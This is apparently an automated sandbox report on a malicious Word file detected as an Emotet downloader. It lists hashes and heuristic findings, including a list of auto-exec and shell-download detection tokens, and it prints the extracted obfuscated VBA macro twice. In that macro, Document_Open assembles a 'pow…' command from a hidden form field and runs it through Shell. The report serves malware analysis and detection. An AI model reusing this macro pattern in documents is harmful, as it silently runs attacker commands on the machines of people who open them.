Office (OLE) malware analysis — malicious · efc4c8c3abd32baf

MALICIOUS

Office (OLE)

265.5 KB Created: 2019-02-01 20:51:00 Authoring application: Microsoft Office Word First seen: 2020-05-14

MD5: f411f5d2df445df7dcbcae6cd5299331 SHA-1: 75ba34139aa75991a1b764579e000eb92e178340 SHA-256: efc4c8c3abd32baf9bc24df0c6753300802baa97817f23e8067253d09d009eb6

250 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6872602-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6872602-0
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER

Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Call Shell(eciGZRmv(1) & XIZRN & qHRos & wtOCSshaV, 0)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2018 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2018 bytes
SHA-256: `87e54f2183351477833a849659fa7d13aaea7d72b26790f6486d28a36be61931`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim sX7Db As Byte sX7Db = 68 Dim Oqkljz8 As Long Oqkljz8 = -506810426 Dim EgcF76fX As Integer EgcF76fX = Sgn(24707) love "o" End Sub Attribute VB_Name = "T0hAE9Cp" Sub love(XIZRN) Dim yLNOHGsp As Boolean yLNOHGsp = False Dim yR9pDn As Long yR9pDn = 0 Dim HMhDJ02z As Double HMhDJ02z = Int(57979.927120303) IjQZIDA = 427 - 32 b7xDS = 8071 / 1153 If IjQZIDA = b7xDS Then qufEs = "mRzYM" End If Dim EgPDd As Long EgPDd = Sgn(-1515376158) Dim rJVAcRmG As Long rJVAcRmG = Sgn(-660417358) Dim nS7wqDu As Integer nS7wqDu = Sgn(10505) zWuhs5w = "sidBpVJryAp2tnVA3MSeta" KFWwgNx = -12833 + 12835 WOtNF = Mid(zWuhs5w, KFWwgNx, -2106 + 2113) Dim EoUrw As Double EoUrw = Val(36799.05421626) qHRos = "w" Dim SEH6T As Single SEH6T = Fix(54947.565502126) Dim aKts9 As Byte aKts9 = 52 Call Shell(eciGZRmv(1) & XIZRN & qHRos & wtOCSshaV, 0) End Sub Attribute VB_Name = "wIS4PAO8m" Public Function eciGZRmv(kItPczE As Integer) Dim MFgSwWDo As Single MFgSwWDo = Fix(2358.4007991678) Dim bXwdb5r2N As Long bXwdb5r2N = Sgn(0) Dim uBbrn3Gz As Double uBbrn3Gz = 56124.934043335 eciGZRmv = "p" End Function Attribute VB_Name = "RejH9yKR" Public Function wtOCSshaV() Dim sWUiY50Z3 As Object Set sWUiY50Z3 = New f Dim RzMbp As Boolean RzMbp = True Dim rZI8dH71 As String rZI8dH71 = sWUiY50Z3.de.Text wtOCSshaV = rZI8dH71 End Function Attribute VB_Name = "f" Attribute VB_Base = "0{55504F83-BCF5-4441-B41D-20129D2AB63D}{81C22A0C-D8A2-425C-ABA1-F13D4570EC2B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 87e54f2183351477833a849659fa7d13aaea7d72b26790f6486d28a36be61931

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()


Dim sX7Db As Byte
sX7Db = 68
Dim Oqkljz8 As Long
Oqkljz8 = -506810426
Dim EgcF76fX As Integer
EgcF76fX = Sgn(24707)
love "o"
End Sub

Attribute VB_Name = "T0hAE9Cp"
Sub love(XIZRN)
Dim yLNOHGsp As Boolean
yLNOHGsp = False
Dim yR9pDn As Long
yR9pDn = 0
Dim HMhDJ02z As Double
HMhDJ02z = Int(57979.927120303)
IjQZIDA = 427 - 32
b7xDS = 8071 / 1153
If IjQZIDA = b7xDS Then
qufEs = "mRzYM"
End If
Dim EgPDd As Long
EgPDd = Sgn(-1515376158)
Dim rJVAcRmG As Long
rJVAcRmG = Sgn(-660417358)
Dim nS7wqDu As Integer
nS7wqDu = Sgn(10505)
zWuhs5w = "sidBpVJryAp2tnVA3MSeta"
KFWwgNx = -12833 + 12835
WOtNF = Mid(zWuhs5w, KFWwgNx, -2106 + 2113)
Dim EoUrw As Double
EoUrw = Val(36799.05421626)
qHRos = "w"
Dim SEH6T As Single
SEH6T = Fix(54947.565502126)
Dim aKts9 As Byte
aKts9 = 52
Call Shell(eciGZRmv(1) & XIZRN & qHRos & wtOCSshaV, 0)
End Sub

Attribute VB_Name = "wIS4PAO8m"
Public Function eciGZRmv(kItPczE As Integer)
Dim MFgSwWDo As Single
MFgSwWDo = Fix(2358.4007991678)
Dim bXwdb5r2N As Long
bXwdb5r2N = Sgn(0)
Dim uBbrn3Gz As Double
uBbrn3Gz = 56124.934043335
eciGZRmv = "p"
End Function

Attribute VB_Name = "RejH9yKR"
Public Function wtOCSshaV()
Dim sWUiY50Z3 As Object
Set sWUiY50Z3 = New f
Dim RzMbp As Boolean
RzMbp = True
Dim rZI8dH71 As String
rZI8dH71 = sWUiY50Z3.de.Text
wtOCSshaV = rZI8dH71
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{55504F83-BCF5-4441-B41D-20129D2AB63D}{81C22A0C-D8A2-425C-ABA1-F13D4570EC2B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.